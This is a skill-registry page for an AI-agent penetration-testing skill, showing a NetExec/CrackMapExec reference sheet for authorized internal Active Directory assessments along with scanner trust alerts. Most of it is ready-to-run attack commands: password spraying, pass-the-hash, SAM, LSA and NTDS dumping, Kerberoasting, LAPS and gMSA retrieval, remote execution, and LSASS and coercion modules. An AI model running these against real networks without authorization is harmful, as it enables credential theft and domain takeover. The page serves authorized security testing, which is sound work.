All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

referencescrackmapexec.md

≈1.3k tokens on demand. Your agent reads this file only when SKILL.md points to it.

CrackMapExec / NetExec Reference

CrackMapExec (cme) is now maintained as NetExec (nxc). Commands below work on both; prefer nxc on new installs.

nxc <protocol> <target> [auth] [action] — protocols: smb, ldap, winrm, mssql, ssh, ftp, rdp, vnc, wmi, nfs.

Authentication probing

# Single cred vs target list
nxc smb targets.txt -u alice -p 'Summer2026!'

# NTLM hash
nxc smb targets.txt -u administrator -H :AAD3B435B51404EEAAD3B435B51404EE --local-auth

# Kerberos ticket
export KRB5CCNAME=/tmp/alice.ccache
nxc smb dc.domain.local --use-kcache

# Show where a user is a local admin (key pivot data)
nxc smb targets.txt -u alice -p 'Summer2026!' | grep '(Pwn3d!)'

Password spraying (lockout-aware)

# Check policy BEFORE spraying
nxc smb dc.domain.local -u alice -p 'Summer2026!' --pass-pol

# Spray — --continue-on-success scans the full list even after a hit
nxc smb dc.domain.local -u users.txt -p 'Spring2026!' --continue-on-success

# Staggered spray with a delay-per-user (prevent bad-pwd-count stacking)
for u in $(cat users.txt); do
  nxc smb dc.domain.local -u "$u" -p 'Spring2026!' --continue-on-success
  sleep 30
done

Leave at least one bad-password-count of headroom below the lockout threshold, and never spray the same account twice within the observation window. When the observation window is 30 minutes and the threshold is 5, safe cadence is roughly ≤4 attempts per account per 35 minutes.

SMB enumeration

# Shares + readable/writable flags
nxc smb target -u alice -p 'Summer2026!' --shares

# Spider shares for interesting filenames / content
nxc smb target -u alice -p 'Summer2026!' \
  -M spider_plus -o EXCLUDE_DIRS='IPC$,print$' DOWNLOAD_FLAG=True

# Sessions (live logons — useful for pivot planning)
nxc smb targets.txt -u alice -p 'Summer2026!' --sessions --loggedon-users

# Password policy, users, groups, RID bruteforce
nxc smb dc.domain.local -u alice -p 'Summer2026!' --pass-pol
nxc smb dc.domain.local -u alice -p 'Summer2026!' --users
nxc smb dc.domain.local -u alice -p 'Summer2026!' --groups
nxc smb dc.domain.local -u '' -p '' --rid-brute 5000

Command execution

# PowerShell via WinRM (cleanest)
nxc winrm target -u admin -p 'pass' -x 'whoami /all'

# SMB exec via psexec/wmiexec/atexec (choose method)
nxc smb target -u admin -p 'pass' -x 'whoami' --exec-method wmiexec
nxc smb target -u admin -H :NTHASH -X '$PSVersionTable'  # -X for PowerShell

# Amsi/AppLocker bypass via obfuscation modules
nxc smb target -u admin -p 'pass' -M enum_av

Credential access modules

# Dump SAM
nxc smb target -u admin -p 'pass' --sam

# Dump LSA
nxc smb target -u admin -p 'pass' --lsa

# DCSync via NTDS
nxc smb dc.domain.local -u da_user -p 'pass' --ntds

# LAPS password retrieval
nxc ldap dc.domain.local -u alice -p 'pass' --laps

# gMSA password retrieval
nxc ldap dc.domain.local -u alice -p 'pass' --gmsa

AD-specific modules

# List common modules
nxc smb -L
nxc ldap -L

# Kerberoast via LDAP
nxc ldap dc.domain.local -u alice -p 'pass' --kerberoasting kerb.out

# AS-REP roast via LDAP
nxc ldap dc.domain.local -u alice -p 'pass' --asreproast asrep.out

# BloodHound collection (triggers sharphound-py internally)
nxc ldap dc.domain.local -u alice -p 'pass' --bloodhound --collection All \
  -ns 10.0.0.1 --dns-server 10.0.0.1

# MachineAccountQuota check
nxc ldap dc.domain.local -u alice -p 'pass' -M maq

# Find computers where domain user is local admin
nxc smb 10.0.0.0/24 -u alice -p 'pass' --loggedon-users

Recommended module set for an internal engagement

Module Protocol Purpose
spider_plus smb Recursive share spidering with filters
lsassy smb Remote LSASS dump + pypykatz parse
enum_av smb AV / EDR enumeration
masky ldap ADCS ESC1 cert issuance via impersonation
adcs ldap Enumerate vulnerable cert templates
petitpotam smb MS-EFSR coercion
shadowcoerce smb MS-FSRVP coercion
laps ldap Pull LAPS-managed passwords
gmsa ldap Pull gMSA account passwords
maq ldap MachineAccountQuota value
dfscoerce smb MS-DFSNM coercion

Safety

  • --continue-on-success is necessary for spray completeness but increases noise. Run from an authorized source IP on an allowlist if possible.
  • Always verify target scope against the ROE before running with targets.txt that came from broad discovery.
  • Dumping NTDS / DCSync should be run once per engagement with justification, and never against read-only DCs without coordination.

Tool versions validated

  • NetExec >= 1.3.0 (or CrackMapExec >= 5.4.0 legacy)

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest